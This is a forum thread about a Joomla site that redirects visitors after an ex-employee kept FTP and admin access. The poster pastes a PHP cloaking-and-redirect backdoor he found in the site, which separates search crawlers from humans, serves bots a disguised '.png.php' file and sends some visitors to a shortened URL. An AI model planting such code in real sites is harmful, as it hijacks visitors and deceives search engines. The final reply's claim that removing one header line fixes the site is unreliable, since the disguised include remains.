Dealing with an ex employee

[Code-Geek]

So guys and gals..
Lets say I have this ex employee that had ftp and admin access to my joomla website...
Now when people click some of the links on my site, it sends me to pornhub.com or something.

Like my google translate will open up and show this


any ideas on how this could have been done, please let me know.

For now.. I'll be working on it.

[Goatboy]

Just taking a shot in the dark here, but might it have something to do with his FTP AND ADMIN ACCESS?

Change the password, first off. Delete his account if you have not already. Look for any recent changes to other accounts. They might have been compromised. Next, scan the links in question to see where they lead, and fix them. Look for any redirect scripts in your pages. This may take a while, but it needs to be done. As a final measure, I'd suggest making backups of your site and store them offline. This should make recovery easier in the future.

[sanddbox]

I have this ex employee that had ftp and admin access

Gee, I can't think of anything!

[Code-Geek]

lol this isn't actually my company..
Someone who hired me..
But yes they removed his ftp and admin access as soon as they figured that out..
Sorry I didn't clarify.
Thanks for the input though.

BTW.. after getting the entire site downloaded and sifting through tons of code, I found this script.

Code: Select all

<?php



$host=$_SERVER['HTTP_HOST'];

$agent=$_SERVER['HTTP_USER_AGENT'];





    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];

    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];

    $server_referer = @$_SERVER['HTTP_REFERER'];

    $server_host = @$_SERVER['HTTP_HOST'];

    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];

    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];

    $server_query_string = @$_SERVER['QUERY_STRING'];

    $server_signature = @$_SERVER['SERVER_SIGNATURE'];

    $server_request = @$_SERVER['REQUEST_URI'];



function detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging){

    $stop_ips_masks = array(

        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255

        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255

        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,

        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255

        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255

        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255

        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255

        "93\.172\.94\.227",                // MacFinder

        "212\.100\.250\.218",            // Wells Search II

        "71\.165\.223\.134",            // Indy Library

        "70\.91\.180\.25",

        "65\.93\.62\.242",

        "74\.193\.246\.129",

        "213\.144\.15\.38",

        "195\.92\.229\.2",

        "70\.50\.189\.191",

        "218\.28\.88\.99",

        "165\.160\.2\.20",

        "89\.122\.224\.230",

        "66\.230\.175\.124",

        "218\.18\.174\.27",

        "65\.33\.87\.94",

        "67\.210\.111\.241",

        "81\.135\.175\.70",

        "64\.69\.34\.134",

        "89\.149\.253\.169",



        "64\.233\.1[6-8][1-9]\.[0-9]+",

        "64\.233\.19[0-1]\.[0-9]+",

        //google from iplists

        "209\.185\.108\.[0-9]+",

        "209\.185\.253\.[0-9]+",

        "209\.85\.238\.[0-9]+",

        "216\.239\.33\.9[6-9]",

        "216\.239\.37\.9[8-9]",

        "216\.239\.39\.9[8-9]",

        "216\.239\.41\.9[6-9]",

        "216\.239\.45\.4",

        "216\.239\.46\.[0-9]+",

        "216\.239\.51\.9[6-9]",

        "216\.239\.53\.9[8-9]",

        "216\.239\.57\.9[6-9]",

        "216\.239\.59\.9[8-9]",

        "216\.33\.229\.163",

        "64\.233\.173\.[0-9]+",

        "64\.68\.8[0-9]\.[0-9]+",

        "64\.68\.9[0-2]\.[0-9]+",

        "72\.14\.199\.[0-9]+",

        "8\.6\.48\.[0-9]+",

        //google from iplists

// 10.0.0.0 - 10.255.255.255 ian:        "207\.211\.40\.82",

        "67\.162\.158\.146",

        "66\.255\.53\.123",

        "24\.200\.208\.112",

        "129\.187\.148\.240",

        "129\.187\.148\.244",

        "199\.126\.151\.229",

        "118\.124\.32\.193",

        "89\.149\.217\.191"



    );

    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawl", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');



    $server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);



    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";

    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask", $server_ip)) {

        $is_human = false;  break;

    }

    if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){

        $is_human = false;  break;

    }

    if($is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {

        $is_human = false;

    }



    if($is_human and strlen($server_user_agent)<=11) {

        $is_human = false;

    }



    if(stristr($server_referer,$server_query_string)) {

        $is_human = false;

    }



    return $is_human;

}



@$is_human = @detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging);

if (@$is_human==false)

{

include "icon2_old.png.php";

exit;

}

if (preg_match('/porn/', $_SERVER["HTTP_REFERER"]) > 0)

{

header("Location: http://bit.ly/7IDKb0");

exit;  }



?>

[Goatboy]

Did you even read that code? 99% of the lines detect spiders, and the second-to-last one redirects to PornTube. Remove the header line and it's fixed.